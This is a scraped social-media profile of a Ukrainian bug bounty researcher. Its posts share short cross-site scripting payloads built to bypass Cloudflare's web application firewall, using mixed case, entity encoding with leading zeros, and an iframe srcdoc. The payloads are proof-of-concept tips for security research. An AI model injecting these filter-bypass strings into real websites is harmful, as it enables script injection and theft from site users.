Anton Korzhynskyi

@tohasec

Security researcher from lovely Ukraine 💙💛

Ukraine

hackerone.com/tohasec

Joined September 2018

18Posts 138Followers 80Following

You might like

@walidhossain_

@samm0uda

@umr4n6

@xalerafera

@alxbrsn

@Regala_

@rudr4_sarkar

@ShMalav

@imranparray101

@H4rSh4D

@PanegavSharan

@sakyb7

@vijithvellora

@Gamliel_InfoSec

@m7mdharon

Anton Korzhynskyi reposted

Bohdan Korzhynskyi

Apr 21, 2020

New Cloudflare XSS Bypass: <svg/OnLoad="`${prompt``}`"> Proof: waf.cumulusfire.net/xss?globalHtml… A strange new solution from Cloudflare engineers. WAF will be weakened if DOM event has uppercase. #WAF #XSS #BugBounty #BugBountyTip

Anton Korzhynskyi reposted

Bohdan Korzhynskyi

Sep 22, 2019

Шановні @the_prozorro та @HackenProof! Я та @page_1337 хочемо передати винагороду за найдені вразливості на #hackprozorro відразу на благодійність дітям, наприклад через blago.privatbank.ua Що для цього потрібно?

Anton Korzhynskyi

Aug 21, 2019

My turn :) Cloudflare #XSS #Bypass <img src onerror=%26emsp;prompt`${document.domain}`> #WAF #BugBounty #BugBountyTip

tohasec's tweet image. My turn :)

Cloudflare #XSS #Bypass

&lt;img src onerror=%26emsp;prompt`${document.domain}`&gt;

#WAF #BugBounty #BugBountyTip

Anton Korzhynskyi reposted

Bohdan Korzhynskyi

Jul 4, 2019

Cloudflare #XSS #Bypass via dot 1'"><img/src/onerror=.1|alert``> #WAF #BugBounty #BugBountyTip

Anton Korzhynskyi reposted

Bohdan Korzhynskyi

Jun 4, 2019

Another #Cloudflare #XSS #Bypass xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'> #WAF #BugBounty #BugBountyTip

Anton Korzhynskyi reposted

Bohdan Korzhynskyi

Jun 4, 2019

Cloudflare XSS Bypass via add 8 or more superfluous leading zeros for dec and 7 or more for hex. Dec: <svg onload=prompt%26%230000000040document.domain)> Hex: <svg onload=prompt%26%23x000000028;document.domain)> #Bypass #WAF #XSS #Cloudflare #BugBountyTip

Anton Korzhynskyi

Sep 7, 2018

Hello, world!

newday

@hackcancare

Austin Augie

@area_fishing

parsa mi

@parsa_mi_

Laura Bopha Phillips

@tri5a0RU39VpI5

Ssss

@baka_newb

pwn2ooown

@pwn2ooown

TECHFUND Inc.( 🇯🇵JAPAN 🇸🇬ASIA)

@techfund_inc

lool0x01

@lool0x01

Jay

@jdnasit26

liyue

@liyue_tutu

Khaz

@bochi01167450

南京 Aa 百货批发

@APortporn52859

𝅙

@joaovarelas

DEEKButter0wos

@0wosk

f0ing

@f00ing

wrongwrong

@biiibii40790209

Godw

@G0djw

zero

@behroozgholiza4

luckone

@1uck0ne

jackssal

@jackssal2

kolten

@Merl1ng

Oleksandr Diakovchenko

@diakovchenko

TipTip

@z0ne0xF

P1n93r

@P1N93R_

Bmth

@Bmth66666

xsser123

@xsser2

joker

@joker247696

凡人多烦事

@SecSummers

TheOmen

@m1lansk1

Eryzon

@Eryzon_alt

FirstKnight

@LeWhiteHorse

mrrobot0x1

@hacker_s26

e2 Security Adria

@e2_adria

Deandra

@DeandraSec

Kalpesh Nagare

@KalpeshNagare6

foss_bee

@bfossung

D@mi3n

@PapsSec

Ahmed Talha

@TOxin_J4CK

Jubayer Ahmed Rhyme

@Jub4y3r_3x009

_Berry

@m5_berry

Rajesh Thodupunoori

@rajesh6927

残

@AaMKd4czE4yDUNM

Aakash Choudhary

@LearnerHunter

Max Yaremchuk

@0xw2w

Aron Laszka

@aalaszka

canlang

@canlang8

Ankit Patel

@pwnnull

DaYu

@SoftNight2

The Paranoids

@TheParanoids

The Daily Swig

@DailySwig

PortSwigger Research

@PortSwiggerRes

kazan71p 🇺🇦

@kazan71p

Synack

@synack

Bounty Security

@BountySecurity

☣ KitPloit - Hacker Tools

@KitPloit

DC3 VDP

@DC3VDP

Danila Chalykin

@xawdxawdx

Hack with GitHub

@HackwithGithub

Nmap Project

@nmap

OWASP Kyiv

@owaspKyiv

TomNomNom

@TomNomNom

Snyk

@snyksec

Assistante

@SerhiiKorolenko

Google VRP (Google Bug Hunters)

@GoogleVRP

BApp Store

@BApp_Store

Web Security Academy

@WebSecAcademy

Mårten Mickos

@martenmickos

Emad Shanab - أبو عبد الله

@Alra3ees

Somdev Sangwan

@s0md3v

Sam Houston

@samhouston

Hack The Box

@hackthebox_eu

Inti De Ceukelaire

@securinti

Yegor Aushev

@Yegor_au

payloadartist

@payloadartist

Olivier Beg

@smiegles

Jack Cable

@jackhcable

Bohdan Korzhynskyi

@bohdansec

Shubham Gupta 🇮🇳

@hackerspider1

Yev🇺🇦

@jerh17

Cobalt

@cobalt_io

Sergey Bobrov

@Black2Fan

Yassine Aboukir 🐐

@Yassineaboukir

Sergey Belov

@sergeybelove

Julien | MrTuxracer 🇪🇺

@MrTuxracer

Artem

@mskwsky

todayisnew

@codecancare

harisec

@har1sec

(((gamliel)))

@Gamliel_InfoSec

Egor Homakov

@homakov

Akita ZeN 🇦🇷

@akita_zen

dawgyg - WoH

@thedawgyg

zseano

@zseano

BugBountyHunter.com 🪲

@BugBountyHunt3r

mongo

@mongobug

Ben Sadeghipour

@NahamSec

Gareth Heyes \u2028

@garethheyes

Mathias Karlsson

@avlidienbrunn

Gerben Javado

@gerben_javado

United States Trends

1. Black Friday 354K posts
2. #SkylineSweeps N/A
3. #FanCashDropPromotion 1,207 posts
4. #releafcannabis N/A
5. WHO DEY 12.7K posts
6. Good Friday 60.1K posts
7. mainz biomed n.v. N/A
8. NextNRG Inc 1,112 posts
9. #FridayVibes 4,202 posts
10. #NutramentHolidayPromotion N/A
11. Andriy Yermak 12.1K posts
12. Clark Lea 1,159 posts
13. Egg Bowl 2,990 posts
14. CONGRATULATIONS JIN 59.9K posts
15. Black Cats 2,980 posts
16. Mr. President 21.8K posts
17. $SMX 8,459 posts
18. Cyber Monday 6,038 posts
19. TODAY ONLY 64.5K posts
20. CONGRATULATIONS J-HOPE 51.5K posts

You might like

Something went wrong.

Something went wrong.